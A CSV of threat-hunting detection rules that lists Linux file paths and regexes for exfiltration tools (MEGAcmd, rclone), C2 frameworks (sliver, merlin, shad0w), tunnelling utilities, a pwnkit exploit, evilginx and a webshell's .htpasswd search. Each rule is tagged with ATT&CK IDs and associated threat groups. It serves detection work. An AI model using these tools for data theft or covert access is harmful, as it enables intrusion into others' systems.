"*/usr/bin/mega-mkdir*",".{0,1000}\/usr\/bin\/mega\-mkdir.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-mount*",".{0,1000}\/usr\/bin\/mega\-mount.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-mv*",".{0,1000}\/usr\/bin\/mega\-mv.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*find . -type f -name .htpasswd*",".{0,1000}find\s\.\s\-type\sf\s\-name\s\.htpasswd.{0,1000}","greyware_tool_keyword","find","find commands used by the wso php webshell","T1100 - T1027 - T1059","TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","351","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*/usr/bin/mega-permissions*",".{0,1000}\/usr\/bin\/mega\-permissions.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-preview*",".{0,1000}\/usr\/bin\/mega\-preview.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-proxy*",".{0,1000}\/usr\/bin\/mega\-proxy.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-put*",".{0,1000}\/usr\/bin\/mega\-put.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-pwd*",".{0,1000}\/usr\/bin\/mega\-pwd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-quit*",".{0,1000}\/usr\/bin\/mega\-quit.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-reload*",".{0,1000}\/usr\/bin\/mega\-reload.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-rm*",".{0,1000}\/usr\/bin\/mega\-rm.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-session*",".{0,1000}\/usr\/bin\/mega\-session.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-share*",".{0,1000}\/usr\/bin\/mega\-share.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-showpcr*",".{0,1000}\/usr\/bin\/mega\-showpcr.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-signup*",".{0,1000}\/usr\/bin\/mega\-signup.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-speedlimit*",".{0,1000}\/usr\/bin\/mega\-speedlimit.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-sync*",".{0,1000}\/usr\/bin\/mega\-sync.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-thumbnail*",".{0,1000}\/usr\/bin\/mega\-thumbnail.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-transfers*",".{0,1000}\/usr\/bin\/mega\-transfers.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-tree*",".{0,1000}\/usr\/bin\/mega\-tree.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-userattr*",".{0,1000}\/usr\/bin\/mega\-userattr.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-users*",".{0,1000}\/usr\/bin\/mega\-users.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-version*",".{0,1000}\/usr\/bin\/mega\-version.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-webdav*",".{0,1000}\/usr\/bin\/mega\-webdav.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-whoami*",".{0,1000}\/usr\/bin\/mega\-whoami.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/merlinAgent*",".{0,1000}\/usr\/bin\/merlinAgent.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","#linux","N/A","10","10","186","57","2024-10-14T13:04:00Z","2020-07-17T20:47:56Z"
"*/usr/bin/pkexec*",".{0,1000}\/usr\/bin\/pkexec.{0,1000}","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tool","https://github.com/Ayrx/CVE-2021-4034","1","1","#linux","N/A","N/A","1","93","14","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z"
"*/usr/bin/polenum*",".{0,1000}\/usr\/bin\/polenum.{0,1000}","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","#linux","N/A","8","10","N/A","N/A","N/A","N/A"
"*/usr/bin/r-agent*",".{0,1000}\/usr\/bin\/r\-agent.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater - UAC-0050","RMM","https://www.remoteutilities.com/","1","0","#linux","linux","10","10","N/A","N/A","N/A","N/A"
"*/usr/bin/rclone*",".{0,1000}\/usr\/bin\/rclone.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","Dispossessor - BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest - EMBER BEA - Gamaredon","Data Exfiltration","https://github.com/rclone/rclone","1","0","#linux","N/A","8","10","47552","4245","2024-12-07T17:34:03Z","2014-03-16T16:19:57Z"
"*/usr/bin/r-viewer*",".{0,1000}\/usr\/bin\/r\-viewer.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater - UAC-0050","RMM","https://www.remoteutilities.com/","1","0","#linux","linux","10","10","N/A","N/A","N/A","N/A"
"*/usr/bin/shad0w*",".{0,1000}\/usr\/bin\/shad0w.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","#content #linux","N/A","N/A","10","2050","324","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z"
"*/usr/local/bin/cloudflared tunnel*",".{0,1000}\/usr\/local\/bin\/cloudflared\stunnel.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider* - Gamaredon - TA4557 - FIN6","C2","https://github.com/cloudflare/cloudflared","1","0","#linux","N/A","10","10","9418","838","2024-12-06T13:05:17Z","2017-10-13T19:54:47Z"
"*/usr/local/bin/escape.sh*",".{0,1000}\/usr\/local\/bin\/escape\.sh.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*/usr/local/bin/exegol*",".{0,1000}\/usr\/local\/bin\/exegol.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","1968","190","2024-11-09T16:23:46Z","2020-03-09T19:12:11Z"
"*/usr/local/bin/jprq*",".{0,1000}\/usr\/local\/bin\/jprq.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#linux","N/A","10","10","1037","148","2024-11-01T08:39:24Z","2020-04-18T10:12:42Z"
"*/usr/local/bin/level*",".{0,1000}\/usr\/local\/bin\/level.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/usr/local/bin/nullinux*",".{0,1000}\/usr\/local\/bin\/nullinux.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","#linux","N/A","7","6","568","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z"
"*/usr/local/bin/reverst*",".{0,1000}\/usr\/local\/bin\/reverst.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","#linux","N/A","10","10","933","37","2024-12-02T17:53:56Z","2024-04-03T13:32:11Z"
"*/usr/local/bin/reverst*",".{0,1000}\/usr\/local\/bin\/reverst.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1572 - T1071.001 - T1105","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","#linux","N/A","10","10","933","37","2024-12-02T17:53:56Z","2024-04-03T13:32:11Z"
"*/usr/local/bin/sliver-server*",".{0,1000}\/usr\/local\/bin\/sliver\-server.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR","C2","https://github.com/BishopFox/sliver","1","0","#linux","N/A","10","10","8641","1139","2024-12-03T20:33:10Z","2019-01-17T22:07:38Z"
"*/usr/local/bin/sshamble*",".{0,1000}\/usr\/local\/bin\/sshamble.{0,1000}","offensive_tool_keyword","sshamble","SSHamble is a research tool for analyzing SSH implementations focusing on attacks against authentication - timing analysis and post-session enumeration.","T1021 - T1040 - T1592 - T1033","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/runZeroInc/sshamble","1","0","#linux","N/A","10","10","917","72","2024-12-06T22:38:19Z","2024-07-27T20:32:10Z"
"*/usr/local/etc/shadowsocks6.json*",".{0,1000}\/usr\/local\/etc\/shadowsocks6\.json.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","#linux","N/A","10","10","8751","1194","2024-12-07T22:26:08Z","2014-10-15T11:02:36Z"
"*/var/lib/level/level.db*",".{0,1000}\/var\/lib\/level\/level\.db.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/var/lib/level/level.log*",".{0,1000}\/var\/lib\/level\/level\.log.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/var/lib/tor/*",".{0,1000}\/var\/lib\/tor\/.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/var/lib/zrok-*",".{0,1000}\/var\/lib\/zrok\-.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","#linux","N/A","10","10","2747","109","2024-12-06T20:00:36Z","2022-07-18T19:14:51Z"
"*/var/log/apache2/forensic_log-10080.log*",".{0,1000}\/var\/log\/apache2\/forensic_log\-10080\.log.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#linux","N/A","8","2","104","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z"
"*/var/log/ehorus_agent.log*",".{0,1000}\/var\/log\/ehorus_agent\.log.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","#logfile #linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/var/log/evilginx*",".{0,1000}\/var\/log\/evilginx.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","BlackCat - COLDRIVER","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","0","#linux","N/A","10","10","11038","1980","2024-08-21T09:13:58Z","2018-07-10T09:59:52Z"
"*/var/log/exegol/*.log*",".{0,1000}\/var\/log\/exegol\/.{0,1000}\.log.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","1968","190","2024-11-09T16:23:46Z","2020-03-09T19:12:11Z"
"*/var/log/jprq/*",".{0,1000}\/var\/log\/jprq\/.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#linux","N/A","10","10","1037","148","2024-11-01T08:39:24Z","2020-04-18T10:12:42Z"
"*/var/log/pagekite/*",".{0,1000}\/var\/log\/pagekite\/.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","#linux","N/A","10","10","725","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"*/var/log/remoteit*",".{0,1000}\/var\/log\/remoteit.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","#linux","N/A","10","10","42","11","2024-11-26T19:36:31Z","2019-01-12T00:59:20Z"
"*/var/log/shadowsocks*",".{0,1000}\/var\/log\/shadowsocks.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","#linux","N/A","10","10","8751","1194","2024-12-07T22:26:08Z","2014-10-15T11:02:36Z"
"*/var/log/tor/*",".{0,1000}\/var\/log\/tor\/.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/var/opt/pgrokd*",".{0,1000}\/var\/opt\/pgrokd.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#linux","N/A","10","10","3218","107","2024-12-01T15:58:30Z","2023-03-08T12:43:55Z"
"*/var/run/pagekite.pid*",".{0,1000}\/var\/run\/pagekite\.pid.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","#linux","N/A","10","10","725","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
